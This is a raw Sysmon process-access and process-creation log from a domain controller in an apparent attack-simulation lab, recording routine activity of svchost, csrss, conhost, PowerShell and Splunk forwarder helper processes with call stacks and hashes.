10341000x800000000000000028602Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:11.943{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028601Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:11.943{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028600Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:11.943{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028599Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:11.943{7901BC46-4984-6008-0500-00000000A301}640656C:\Windows\system32\csrss.exe{7901BC46-538B-6008-8B06-00000000A301}1408C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000028598Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:11.943{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-538B-6008-8B06-00000000A301}1408C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000028597Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:11.945{7901BC46-538B-6008-8B06-00000000A301}1408C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000028596Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:11.302{7901BC46-538B-6008-8A06-00000000A301}68248076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028595Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:11.146{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-538B-6008-8A06-00000000A301}6824C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028594Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:11.146{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028593Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:11.146{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028592Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:11.146{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028591Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:11.146{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028590Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:11.146{7901BC46-4984-6008-0500-00000000A301}6401076C:\Windows\system32\csrss.exe{7901BC46-538B-6008-8A06-00000000A301}6824C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000028589Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:11.146{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-538B-6008-8A06-00000000A301}6824C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000028588Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:11.147{7901BC46-538B-6008-8A06-00000000A301}6824C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000028613Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:12.724{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-538C-6008-8C06-00000000A301}2468C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028612Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:12.724{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028611Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:12.724{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028610Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:12.724{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028609Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:12.724{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028608Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:12.724{7901BC46-4984-6008-0500-00000000A301}640656C:\Windows\system32\csrss.exe{7901BC46-538C-6008-8C06-00000000A301}2468C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000028607Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:12.724{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-538C-6008-8C06-00000000A301}2468C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000028606Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:12.726{7901BC46-538C-6008-8C06-00000000A301}2468C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000028605Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:12.099{7901BC46-538B-6008-8B06-00000000A301}14085136C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028695Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.724{7901BC46-538F-6008-8F06-00000000A301}23847896C:\Windows\system32\conhost.exe{7901BC46-538F-6008-8E06-00000000A301}7020C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028694Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.599{7901BC46-4A88-6008-F200-00000000A301}19122148C:\Windows\system32\csrss.exe{7901BC46-538F-6008-8F06-00000000A301}2384C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000028693Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.599{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028692Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.599{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028691Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.599{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 